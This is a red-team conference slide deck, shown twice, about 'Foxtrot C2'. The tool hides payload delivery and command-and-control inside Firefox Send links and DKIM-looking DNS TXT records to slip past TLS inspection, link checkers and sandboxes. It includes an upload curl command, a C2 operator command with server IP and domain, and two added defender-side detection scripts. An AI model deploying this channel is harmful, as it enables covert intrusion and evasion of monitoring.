Foxtrot C2. A Journey of Payload Delivery
Safe(r) In-flight Payload Delivery
Dimitry Snezhkov
DerbyCon 8.0
Officially:
Sr. Managing Consultant, X-Force Red, IBM Corporation
Boils down to work with:
• Netz
• Appz
• Toolz
• Codez
• Humanz
About
Silence on the wire 30 minutes into sending a known good payload in a phish:
Realization: Payload did not make it to the end user
... was it the link checker?
... was it the new / uncategorized domain access policy?
... was the payload package format caught by in-flight content inspection tools?
... did the user lack supported programs to deal with unwrapping the application payload?
Note: The silence may be broken by a friendly sandbox visit under the name ”BOBS-PC”, joined by 12 more peers fetching and analyzing the payload over and over again. It’s a party, but not the one you want to be a part of!
Now, can damage be contained/minimized? Can I avoid or delay attribution?
Have You Ever …. ?
• Reasonably acquiesced networks scream anomalies.
• TLS Unwrap is a given
• Behavioral patterns, load, type, frequency, etc.
• If we allow the defense to build a “story” of activities, the vector is burned.
Strike One: Traffic Correlation
• Interception and immediate analysis of self-contained payloads. Rinse and repeat.
• Correlation rules on payload spread across enterprise
• Submission to cloud, analysis engines. No reuse.
Strike Two: Payload Sampling
• Link inspection
• Domain ranking
• Attribution and possibly defensive retaliation
• Etc. etc.
So…. Let’s minimize their effects, and avoid a few of them too.
Strike Three: A La Carte Offensive Pain Menu
• Properly configured, layered in-flight defenses can be very effective for the Defense.
• They can also be annoying to the Offense:
§ may not be reliably replicated in a test lab, or even known
§ may lead to offensive teams giving up too early in the game.
• (Not fighting OS defensive mechanisms here)
Our Focus – In flight Defense
An alternative offensive content delivery mechanism is needed.
Primary goals:
1. Capability to deliver content across hostile traffic inspection mediums, with TLS traffic inspection assumed.
2. Capability to reach externally hosted content from the inside in the face of a strict content proxy and heavy domain ranking.
3. Capability to decrease repeatable sampling of externally hosted attacker content by defensive mechanisms, by controlling content access parameters, including one-time links, storage expiration and access limits.
4. + Capability to minimize attribution at the initial visit/download/delivery stage.
5. + Capability to pass by link inspectors (e.g. UrlDefense)
6. + High degree of utilization needed.
Secondary goals:
Lao Tzu says: we shall discuss them later ;)
Offensive Payload Delivery Mechanism Improvements
Operation: Firefox Send Private, Encrypted File Sharing
1. Sender uploads file
2. Firefox stores the file encrypted, w/ shared key and basic access rules
3. Recipient downloads file
Platform: Firefox Send Private, Encrypted File Sharing
WebCrypto API* with the AES-GCM algorithm to encrypt and decrypt the file in the browser
The file that's transferred to Mozilla's server is already encrypted and its contents can't be viewed by Mozilla
• The link includes the encryption key
• Anyone with the link can download and access the file.
• 1 GB file size limit
• 1-24 times download limit
*Web Crypto API: https://www.w3.org/TR/WebCryptoAPI
• Send server can be deployed as a standalone server ( https://github.com/mozilla/send )
• Or hosted at https://send.firefox.com/ (our use case)
Request (upload file and encrypt):
POST /api/upload HTTP/1.1
Host: send.firefox.com
X-File-Metadata: {"id":"55c97f947fc479547f16f125","filename":"monastery1.jpg"}
Response (additional owner/ID info):
{"url":"https://send.firefox.com/download/3f9805bcd7/","owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"}
Encrypted Link Format:
https://send.firefox.com/download/3f9805bcd7/#M3DA7NgkqlswuM9GFT4BCA
Platform: Firefox Send Private, Encrypted File Sharing
Goal 1: Capability to deliver content across hostile traffic inspection (e.g. TLS traffic inspection)
• Decryption of content in the browser by JS
Encrypted last mile delivery
https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg
• The proxy can inspect TLS, but will only see an encrypted blob.
• Unless the mechanism is known, it will rarely attempt to automatically detect and unwrap application-layer encryption.
• One-time shared key between the browser of the uploader and the browser of the file recipient.
• We don’t have to generate it; FF Send takes care of that.
Solving key distribution
Evaluating Firefox Send Private Sharing Against Our Goals
Goal 2: Capability to reach hosted content in the face of a content proxy and heavy domain ranking
https://send.firefox.com/
Mostly ranked high and “safe”
Evaluating Firefox Send Private Sharing Against Our Goals
Goal 3: Capability to decrease repeatable sampling of content by the defense by controlling content access parameters, including expiration and access limits.
Advantages:
• Link download throttling: 1-20 times. The sandbox gets nothing on the 2nd attempt.
• Generous size of files (up to 1 GB)
• Link expiration by time (24 hours)
• File forced/manual deletion.
• Additional encryption passwords.
Further logic can be built. We will see more when we discuss secondary goals.
Evaluating Firefox Send Private Sharing Against Our Goals
Goal 4: Capability to minimize attribution.
• Storage OpSec: Ephemeral storage promise
• No account to create. Owner is ephemeral
File One: {"url":"https://send.firefox.com/download/3f9805bcd7/","owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"}
File Two: {"url":"https://send.firefox.com/download/1839672b2a/","owner":"77b8a3559416aa14d668","id":"1839672b2a"}
Who is owner 77b8a3559416aa14d668?? (anonymous uploads)
Evaluating Firefox Send Private Sharing Against Our Goals
Goal 5: Capability to minimize response from link inspectors
https://send.firefox.com/download/1839672b2a/#os171fpGxYOLOykVYREN8w
looks better than https://rogue.me/download/file
Goal 6: Ability to progressively build delivery with off-the-shelf tools. Utilization / availability in all environments.
The problem with shared keys and fully custom application encryption: format support. Can you guarantee a client is able to unwrap?
All you really need is a Firefox/Chrome/Safari browser with the JS WebCrypto API. Edge (later/never?)
Evaluating Firefox Send Private Sharing Against Our Goals
Weaponizing A Happy File Sharing Service
One time. Two times. Automate.
1. Building a delivery framework of agents based on the existing capabilities.
2. Solving task synchronization with split data and command channels.
3. Building command execution capability and hooks into the external C&C
Secondary Goals: Automation
Goal 1: Building delivery agents based on the existing capabilities.
• FFSend is Browser to Browser, via WebAPI Crypto JS. Can we replicate / automate?
curl 'https://send.firefox.com/api/upload' \
  -H 'Authorization: send-v1 4m6CIIsv28NhHzFwI4coO7NQ4ptuH2dkQ2m0Fmft2B0j1ZcE18aeUWfIa3iuVyTQURKHZ4OboKxZmcCJCFmKJQ' \
  -H 'Origin: https://send.firefox.com' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ6VYFlqCoVpBLf6Y' \
  -H 'X-File-Metadata: J8OulomBWho3RdLoeHBkOh23c5glLkfNLPHMZcV6Yctny1ydtkDsol1D_cJ8mQ-G2o_c8wu6_avkca8o5-E4itPpOuzE2AD2hfGTA-TYjw' \
  --data-binary $'------WebKitFormBoundaryQ6VYFlqCoVpBLf6Y\r\nContent-Disposition: form-data; name="data"; filename="blob"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryQ6VYFlqCoVpBLf6Y--\r\n' \
  --compressed
Response:
{"url":"https://send.firefox.com/download/58d18f7c65/","delete":"0120a59343513ec237a4","id":"58d18f7c65"}
Secondary Goals: Automation
Goal 1: Building delivery agents based on the existing capabilities (Cont.)
JS Crypto WebAPI = Crypto Standards + HTTP libraries
Py Crypto WebAPI = Crypto Standards + HTTP libraries
Secondary Goals: Automation
Agent Delivery Notification Problem: How do you make the other party know the shared key / URL?
https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg
Notification side channels. The usual candidates: HTTP, ICMP, DNS, etc.
• HTTPS: Possible, but:
§ Another highly ranked domain needed. Partially defeats the purpose.
§ Assume inspection of TLS, so another custom protocol to protect.
• ICMP: Fairly limited structure- and capacity-wise, well inspected.
• DNS: Inspected, but we can probably blend in.
Goal 1: Building delivery agents based on the existing capabilities (Cont.)
Secondary Goals: Automation
Goal 2: Solving synchronization with split data and command channels.
DNS:
• Data channel to FFSend.
• Command channel to DNS.
Wanted features:
• Avoid detection with well-behaved packets across reasonably infrequent traffic. No splitting of a 1 GB file and sending it across many DNS TXT records.
• Dynamic DNS updates from the agents, access control with Transaction Signatures (TSIG)
• Commands over well-formed TXT DKIM records.
• Additional record content encryption with the FFSend shared key.
Secondary Goals: Automation
Communication Protocol Contract
How do we introduce communication directives? Develop an application DSL protocol.
1. DNS TXT Record for an agent:
352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream @138.68.224.147
2. DNS TXT Record Content (encrypted with the agent key), looks normal:
v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek
3. Decrypted DKIM Record Instruction (request metadata, location of payload), the DNS record PAYLOAD:
{ 't':'q', 's':'J', 'c':'o', 'u':'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3' }
Communication Protocol Contract
• Might as well shuttle data AND commands.
• Master/Slave concept by role
• Peer-to-Peer concept by capability.
• Store and poll model between the parties via the FFSend service.
Goal 3: Building command execution from the external C&C
Secondary Goals: Automation
Foxtrot C2
DATA channel: Firefox Send Service
COMMAND channel: PowerDNS (choice)
• Flexibility: backend (SQL, Bind, Pipe, etc.); HTTP API possible (future fallback, round robin)
• Agents can change roles (Master/Slave)
• Agents can communicate P2P (WIP)
• Command line and TUI menu driven
• Agents can be hosted on FF Send.
• Jitter/Intervals to blend in traffic (WIP)
• Internal agent commands (WIP)
• Download or push files
• Download or push instructions for OSexec()
• Planned LTKM
Python for now
Foxtrot Operation
./foxtrot.py --agent agent_195694e2 --tsigname test2 --tsigrdata ./config/tsig-test2.dat \
  --nserver 138.68.234.147 --domain s3bucket.stream --role master --verbose info \
  send --operation ocmd --ocmd 'ps -ef | grep bash'
(Diagram: Slave and Master agents)
1. Master (Post Job to Slave)
2. Slave (Receipt of Request):
• Checks DNS record for its instructions
• Fetches linked data file from FFSend
• Processes (command or saves data) as instructed
• Posts results back to FFSend
• Updates DNS
3. Master (Get Response):
• Checks DNS record for updates from Slave
• Fetches linked data file from FFSend
• Processes command output as instructed
• Updates DNS record for Slave Agent
Interactive Console. Master/Slave
Batch. Send commands, data from command line
Foxtrot C2: Modes of Operation
Wire and Defense
• Sample the number of DNS TXT requests/responses and DKIM pointers
• Vendors and standalone implementations:
§ render CAPTCHAs for uploads
§ throttle the number of uploads from the endpoint
• Expect split-protocol delivery across multiple channels
• Payload delivery itself is neither easy nor hard; it’s a challenge with variables.
• Despite popular belief, great defensive setups exist that eat offense for lunch.
• Know thyself. Challenge: instrumented, understood business processes, acquiesced networks.
Un-?Common State of Affairs
Parting Thoughts
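A defender-side check for the two things the deck hands the blue team: the DKIM-shaped TXT records of the Communication Protocol Contract slide and the "sample the number of DNS TXT requests / DKIM pointers" advice under Wire and Defense. This is an added example, not code from the talk or from the Foxtrot tool; the query log, the MAIL_SERVERS allow-list and the DER-framed sample key are constructed, and PAGE_RECORD is the (truncated) record as printed on the slide.

```python
import base64
import re
from collections import Counter

# Constructed DNS query log (client, qtype, qname); not from the talk. The first
# name mimics the per-agent _domainkey TXT record shown on the protocol slide.
SAMPLE_QUERY_LOG = """\
10.0.5.21 TXT 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream
10.0.5.21 TXT 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream
10.0.5.21 TXT 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream
10.0.5.21 TXT 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream
10.0.0.25 TXT selector1._domainkey.example.org
10.0.5.40 A send.firefox.com
"""

# Assumption: only these hosts (mail gateways) are expected to resolve DKIM keys.
MAIL_SERVERS = {"10.0.0.25"}
HEX_SELECTOR = re.compile(r"^[0-9a-f]{32}$")

# The record exactly as printed on the slide (its p= value is cut off there).
PAGE_RECORD = "v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek"


def parse_dkim_txt(txt):
    """Split a DKIM TXT record into its tag=value pairs (RFC 6376 tag list)."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip()] = v.strip()
    return tags


def der_sequence_length(blob):
    """Total length claimed by a leading DER SEQUENCE header, or None if absent."""
    if len(blob) < 2 or blob[0] != 0x30:
        return None
    first = blob[1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long-form: n length bytes follow
    if n == 0 or len(blob) < 2 + n:
        return None
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def dkim_key_findings(txt):
    """Reasons a DKIM TXT record does not look like a genuine public-key record."""
    tags = parse_dkim_txt(txt)
    findings = []
    if tags.get("v") != "DKIM1":
        findings.append("missing v=DKIM1")
    if "y" in tags.get("t", "").split(":"):
        findings.append("t=y testing flag set")
    p = tags.get("p", "")
    if not p:
        findings.append("empty p= (key revoked or placeholder)")
        return findings
    try:
        raw = base64.b64decode(p + "=" * (-len(p) % 4), validate=True)
    except ValueError:
        findings.append("p= is not valid base64")
        return findings
    claimed = der_sequence_length(raw)
    if claimed is None:
        findings.append("p= does not start with a DER SEQUENCE")
    elif claimed != len(raw):
        findings.append("DER length %d does not match %d bytes" % (claimed, len(raw)))
    return findings


def suspicious_domainkey_lookups(log, mail_servers, threshold=3):
    """Per-client count of _domainkey TXT lookups, keeping only non-mail hosts that
    poll such names repeatedly or ask for hex-blob selectors like the agent's."""
    counts, hex_clients = Counter(), set()
    for line in log.splitlines():
        client, qtype, qname = line.split()
        labels = qname.lower().split(".")
        if qtype != "TXT" or "_domainkey" not in labels:
            continue
        counts[client] += 1
        if HEX_SELECTOR.match(labels[0]):
            hex_clients.add(client)
    return {c: n for c, n in counts.items()
            if c not in mail_servers and (n >= threshold or c in hex_clients)}


def _fake_spki():
    """Constructed DER-framed blob (a SEQUENCE whose long-form length covers its
    body); not a real RSA key, only the framing that genuine p= values share."""
    body = bytes(range(256)) + bytes(range(38))
    return b"\x30\x82" + len(body).to_bytes(2, "big") + body


GOOD_RECORD = "v=DKIM1; k=rsa; p=" + base64.b64encode(_fake_spki()).decode()

if __name__ == "__main__":
    print("good record:", dkim_key_findings(GOOD_RECORD))
    print("slide record:", dkim_key_findings(PAGE_RECORD))
    print("noisy clients:", suspicious_domainkey_lookups(SAMPLE_QUERY_LOG, MAIL_SERVERS))
```

Neither check is conclusive on its own: a legitimately misconfigured DKIM record also fails the framing test, so the record findings are meant to be combined with the per-client polling count before anyone raises an alert.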
Q&A
Temporary location (will move, follow Twitter @Op_nomad):
https://github.com/gh0std4ncer1/foxtrot
Thanks!

HTML Injection Attacks: Impact and Mitigation Strategies
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

Foxtrot C2: A Journey of Payload Delivery

  • 1. Foxtrot C2. A Journey of Payload Delivery
    Safe(r) In-flight Payload Delivery
    Dimitry Snezhkov, DerbyCon 8.0
  • 2. About
    Officially: Sr. Managing Consultant, X-Force Red, IBM Corporation
    Boils down to work with:
    • Netz
    • Appz
    • Toolz
    • Codez
    • Humanz
  • 3. Have You Ever …. ?
    Silence on the wire 30 minutes into sending a known good payload in a phish:
    Realization: Payload did not make it to the end user
    ... was it the link checker?
    ... was it the new / uncategorized domain access policy?
    ... was the payload package format caught by in-flight content inspection tools?
    ... did the user lack supported programs to deal with unwrapping the application payload?
    Note: The silence may be broken by a friendly sandbox visit under the name "BOBS-PC", joined by 12 more peers fetching and analyzing the payload over and over again. It’s a party, but not the one you want to be a part of!
    Now, can damage be contained/minimized? Can I avoid or delay attribution?
  • 4. Strike One: Traffic Correlation
    • Reasonably acquiesced networks scream anomalies.
    • TLS Unwrap is a given
    • Behavioral patterns, load, type, frequency, etc.
    • If we allow defense to build a “story” of activities the vector is burned.
  • 5. Strike Two: Payload Sampling
    • Interception and immediate analysis of self-contained payloads. Rinse and repeat
    • Correlation rules on payload spread across enterprise
    • Submission to cloud, analysis engines. No reuse.
  • 6. Strike Three: A La Carte Offensive Pain Menu
    • Link inspection
    • Domain ranking
    • Attribution and possibly defensive retaliation
    • Etc. etc.
    So…. Let’s minimize their effects, and avoid a few of them too.
  • 7. Our Focus – In-flight Defense
    • Properly configured layered in-flight defenses can be very effective for the Defense.
    • They can also be annoying to the Offense
      • may not be reliably replicated in test/lab or known
      • may lead to offensive teams giving up too early in the game.
    • (Not fighting OS defensive mechanisms here)
  • 8. Offensive Payload Delivery Mechanism Improvements
    An alternative offensive content delivery mechanism is needed.
    Primary goals:
    1. Capability to deliver content across hostile traffic inspection mediums. E.g. TLS traffic inspection assumed.
    2. Capability to reach externally hosted content from the inside in the face of a strict content proxy and heavy domain ranking.
    3. Capability to decrease repeatable sampling of externally hosted attacker content by defensive mechanisms by controlling content access parameters, including one-time links, storage expiration, access limits.
    4. + Capability to minimize attribution at the initial visit/download/delivery stage.
    5. + Capability to pass by link inspectors (e.g. UrlDefense)
    6. + High degree of utilization needed.
    Secondary goals: Lao Tzu says: we shall discuss them later ;)
  • 9. Operation: Firefox Send Private, Encrypted File Sharing
    1. Sender Uploads File
    2. Firefox Stores Encrypted w/Shared Key. Basic Access rules.
    3. Recipient Downloads File
  • 10. Platform: Firefox Send Private, Encrypted File Sharing
    WebCrypto API (https://www.w3.org/TR/WebCryptoAPI) with the AES-GCM algorithm to encrypt and decrypt the file in the browser.
    The file that's transferred to Mozilla's server is already encrypted and its contents can't be viewed by Mozilla.
    • The link includes the encryption key
    • Anyone with the link can download and access the file.
    • 1 GB file size limit
    • 1-24 times download limit
  • 11. Platform: Firefox Send Private, Encrypted File Sharing
    • Send server can be deployed as a standalone server (https://github.com/mozilla/send)
    • Or hosted at https://send.firefox.com/ (our use case)
    Request (upload file and encrypt):
      POST /api/upload HTTP/1.1
      Host: send.firefox.com
      X-File-Metadata: {"id":"55c97f947fc479547f16f125","filename":"monastery1.jpg"}
    Response (additional Owner/ID info):
      {"url":"https://send.firefox.com/download/3f9805bcd7/","owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"}
    Encrypted Link Format:
      https://send.firefox.com/download/3f9805bcd7/#M3DA7NgkqlswuM9GFT4BCA
  • 12. Evaluating Firefox Send Private Sharing Against Our Goals
    Goal 1: Capability to deliver content across hostile traffic inspection (e.g. TLS traffic inspection)
    Encrypted last-mile delivery: decryption of content in the browser by JS
      https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg
    • Proxy can inspect TLS, will see an encrypted blob.
    • Unless the mechanism is known, it will rarely attempt to automatically detect and unwrap application encryption.
    Solving key distribution:
    • One-time shared key between the browser of the uploader and the browser of the file recipient.
    • We don’t have to generate it, FF Send takes care of that.
  • 13. Evaluating Firefox Send Private Sharing Against Our Goals
    Goal 2: Capability to reach hosted content in the face of a content proxy and heavy domain ranking
    https://send.firefox.com/ is mostly ranked high and “safe”
  • 14. Evaluating Firefox Send Private Sharing Against Our Goals
    Goal 3: Capability to decrease repeatable sampling of content by defense by controlling content access parameters, including expiration, access limits.
    Advantages:
    • Link download throttling: 1-20 times. Sandbox gets nothing on the 2nd attempt
    • Generous size of files (up to 1 GB)
    • Link expiration by time (24 hours)
    • File forced/manual deletion.
    • Additional encryption passwords.
    Further logic can be built. We will see more when we discuss secondary goals.
  • 15. Evaluating Firefox Send Private Sharing Against Our Goals
    Goal 4: Capability to minimize attribution.
    • Storage OpSec: Ephemeral storage promise
    • No account to create. Owner is ephemeral
    File One: {"url":"https://send.firefox.com/download/3f9805bcd7/","owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"}
    File Two: {"url":"https://send.firefox.com/download/1839672b2a/","owner":"77b8a3559416aa14d668","id":"1839672b2a"}
    Who is owner 77b8a3559416aa14d668 ?? (anonymous uploads.)
  • 16. Evaluating Firefox Send Private Sharing Against Our Goals
    Goal 5: Capability to minimize response from link inspectors
      https://send.firefox.com/download/1839672b2a/#os171fpGxYOLOykVYREN8w
    looks better than
      https://rogue.me/download/file
    Goal 6: Ability to progressively build delivery with off-the-shelf tools. Utilization / availability in all environments.
    The problem of shared keys in fully custom application encryption: format support. Can you guarantee a client is able to unwrap?
    All you really need is a Firefox/Chrome/Safari browser with the JS Crypto WebAPI. Edge (later/never?)
  • 17. Weaponizing A Happy File Sharing Service
  • 18. Secondary Goals: Automation
    One time. Two times. Automate.
    1. Building a delivery framework of agents based on the existing capabilities.
    2. Solving task synchronization with split data and command channels.
    3. Building command execution capability and hooks into the external C&C
  • 19. Secondary Goals: Automation
    Goal 1: Building delivery agents based on the existing capabilities.
    • FFSend is Browser to Browser, via WebAPI Crypto JS. Can we replicate / automate?
      curl 'https://send.firefox.com/api/upload' \
        -H 'Authorization: send-v1 4m6CIIsv28NhHzFwI4coO7NQ4ptuH2dkQ2m0Fmft2B0j1ZcE18aeUWfIa3iuVyTQURKHZ4OboKxZmcCJCFmKJQ' \
        -H 'Origin: https://send.firefox.com' \
        -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ6VYFlqCoVpBLf6Y' \
        -H 'X-File-Metadata: J8OulomBWho3RdLoeHBkOh23c5glLkfNLPHMZcV6Yctny1ydtkDsol1D_cJ8mQ-G2o_c8wu6_avkca8o5-E4itPpOuzE2AD2hfGTA-TYjw' \
        --data-binary $'------WebKitFormBoundaryQ6VYFlqCoVpBLf6Y\r\nContent-Disposition: form-data; name="data"; filename="blob"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryQ6VYFlqCoVpBLf6Y--\r\n' \
        --compressed
    Response:
      {"url":"https://send.firefox.com/download/58d18f7c65/","delete":"0120a59343513ec237a4","id":"58d18f7c65"}
  • 20. Secondary Goals: Automation
    Goal 1: Building delivery agents based on the existing capabilities (Cont.)
    JS Crypto WebAPI = Crypto Standards + HTTP libraries
    Py Crypto WebAPI = Crypto Standards + HTTP libraries
  • 21. Secondary Goals: Automation
    Goal 1: Building delivery agents based on the existing capabilities (Cont.)
    Agent Delivery Notification Problem: How do you make the other party know the shared key / URL?
      https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg
    Notification side channels. The usual candidates: HTTP, ICMP, DNS, etc.
    • HTTPS: Possible but:
      § Another highly ranked domain needed. Partially defeats the purpose.
      § Assume inspection of TLS, so another custom protocol to protect.
    • ICMP: Fairly limited structure- and capacity-wise, well inspected.
    • DNS: Inspected but we can probably blend in.
  • 22. Secondary Goals: Automation
    Goal 2: Solving synchronization with split data and command channels.
    DNS:
    • Data channel to FFSend.
    • Command channel to DNS.
    Wanted features:
    • Avoid detection with well-behaved packets across reasonably infrequent traffic. No splitting of a 1GB file and sending it across many DNS TXT records.
    • Dynamic DNS updates from the agents, access control with Transaction Signatures
    • Commands over well-formed TXT DKIM records.
    • Additional record content encryption with FFSend shared key.
  • 23. Communication Protocol Contract
    And how do we introduce communication directives? Develop an application protocol.
    DNS Record PAYLOAD:
      {'t':'q', 's':'J', 'c':'o', 'u':'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3'}
  • 24. Communication Protocol Contract
    How do we introduce communication directives? Develop an application DSL protocol.
    1. DNS TXT Record for an agent:
      352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream @138.68.224.147
    2. DNS TXT Record Content (Encrypted with agent key):
      v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek
    3. Decrypted DKIM Record Instruction (request metadata, location of payload):
      {'t':'q', 's':'J', 'c':'o', 'u':'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3'}
  • 26. Secondary Goals: Automation
    Goal 3: Building command execution from the external C&C
    • Might as well shuttle data AND commands.
    • Master/Slave concept by role
    • Peer-to-Peer concept by capability.
    • Store and poll model between the parties via FFSend service.
  • 27. Foxtrot C2
    DATA channel: Firefox Send Service
    COMMAND channel: PowerDNS (choice)
    • Flexibility: Backend (SQL, Bind, Pipe, etc.). HTTP API possible (future fallback, round robin)
    • Agents can change roles (Master/Slave)
    • Agents can communicate P2P (WIP)
    • Command line and TUI menu driven
    • Agents can be hosted on FF Send.
    • Jitter/Intervals to blend in traffic (WIP)
    • Internal agent commands (WIP)
    • Download or push files
    • Download or push instructions for OSexec()
    • Planned LTKM
    Python for now
  • 28. Foxtrot Operation
      ./foxtrot.py --agent agent_195694e2 --tsigname test2 --tsigrdata ./config/tsig-test2.dat --nserver 138.68.234.147 --domain s3bucket.stream --role master --verbose info send --operation ocmd --ocmd 'ps -ef | grep bash'
    Slave / Master
    1. Master (Post Job to Slave)
    2. Slave (Receipt of Request):
      • Checks DNS record for its instructions
      • Fetches linked data file from FFSend
      • Processes (command or saves data) as instructed
      • Posts results back to FFSend
      • Updates DNS
    3. Master (Get Response):
      • Checks DNS record for updates from Slave
      • Fetches linked data file from FFSend
      • Processes command output as instructed
      • Updates DNS record for Slave Agent
  • 29. Foxtrot C2: Modes of Operation
    Interactive Console. Master/Slave
    Batch. Send commands, data from command line
  • 30. Wire and Defense
    • Sample number of DNS TXT requests/responses, DKIM pointers
    • Vendors and Standalone implementations:
      • render CAPTCHAs for uploads
      • throttle number of uploads from the endpoint
    • Expect split protocol delivery across multiple channels
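Slide 30's first bullet, sampling DNS TXT answers and DKIM pointers, turned into a concrete check. This is an added example, not Foxtrot's code or the talk's: it reads constructed resolver log lines (the slide 24 record plus made-up entries), flags `_domainkey` TXT answers whose `p=` tag is not a DER-encoded RSA public key, and flags selectors whose answer changes across the log. The log format `<epoch> <client> <qname> TXT <rdata>` is an assumption.

```python
import base64, binascii
from collections import defaultdict

MIN_SPKI_LEN = 160  # a 1024-bit RSA SubjectPublicKeyInfo is about 162 DER bytes
# Constructed stand-ins, NOT real keys: a DER SEQUENCE header sized like a 2048-bit SPKI over a zero body,
# and an opaque base64 blob standing in for an encrypted command record.
FAKE_GOOD_KEY = base64.b64encode(b"\x30\x82\x01\x22" + bytes(0x122)).decode()
OPAQUE_BLOB = base64.b64encode(b"constructed ciphertext").decode()
# Constructed resolver log "<epoch> <client> <qname> TXT <rdata>"; line 3 is the record from slide 24.
SAMPLE_LOG = f"""\
1538400001 10.0.0.25 mail._domainkey.example.com TXT v=DKIM1; k=rsa; p={FAKE_GOOD_KEY}
1538400002 10.0.0.25 mail._domainkey.example.com TXT v=DKIM1; k=rsa; p={FAKE_GOOD_KEY}
1538400010 10.0.0.77 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream TXT v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek
1538400070 10.0.0.77 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream TXT v=DKIM1; h=sha256; k=rsa; t=y; s=email; p={OPAQUE_BLOB}
"""

def parse_dkim_tags(rdata):
    """Split 'tag=value; tag=value' into a dict; only the first '=' separates tag from value."""
    tags = {}
    for part in rdata.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip()] = value.strip()
    return tags

def dkim_key_plausible(p):
    """True when p= is base64 of a DER SEQUENCE whose declared length matches and is key-sized."""
    try:
        der = base64.b64decode(p, validate=True)
    except (binascii.Error, ValueError):
        return False
    if len(der) < MIN_SPKI_LEN or der[0] != 0x30:
        return False
    hdr = 2 + (der[1] & 0x7F) if der[1] > 0x80 else 2          # long-form length for key-sized blobs
    length = int.from_bytes(der[2:hdr], "big") if der[1] > 0x80 else der[1]
    return hdr + length == len(der)

def analyse(log_text):
    """Return (qname, reason) alerts for DKIM-looking TXT answers that do not behave like DKIM keys."""
    alerts, seen = [], defaultdict(set)
    for line in log_text.splitlines():
        _ts, _client, qname, rtype, rdata = line.split(" ", 4)
        if rtype != "TXT" or "._domainkey." not in qname:
            continue
        tags = parse_dkim_tags(rdata)
        # k=rsa (the default) must carry a DER SubjectPublicKeyInfo; an empty p= is a revoked key (RFC 6376)
        if tags.get("p") and tags.get("k", "rsa") == "rsa" and not dkim_key_plausible(tags["p"]):
            alerts.append((qname, "p= is not a DER-encoded RSA public key"))
        seen[qname].add(rdata)
    # Key material for one selector changes rarely; several distinct answers suggest dynamic updates
    alerts += [(q, f"{len(v)} distinct TXT answers") for q, v in seen.items() if len(v) > 1]
    return alerts
```

Real RSA keys pass the DER check, so the two `s3bucket.stream` answers are the only lines flagged, once for the malformed key and once for the changing record.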
  • 31. Parting Thoughts
    • Payload Delivery itself is neither easy nor hard, it’s a challenge with variables.
    • Despite popular belief, great defensive setups exist that eat offense for lunch.
    • Know thyself. Challenge: Instrumented, understood business processes, acquiesced networks. Un-?Common State of Affairs
  • 32. Q&A
    Temporary location (will move, follow Twitter @Op_nomad): https://github.com/gh0std4ncer1/foxtrot
    Thanks!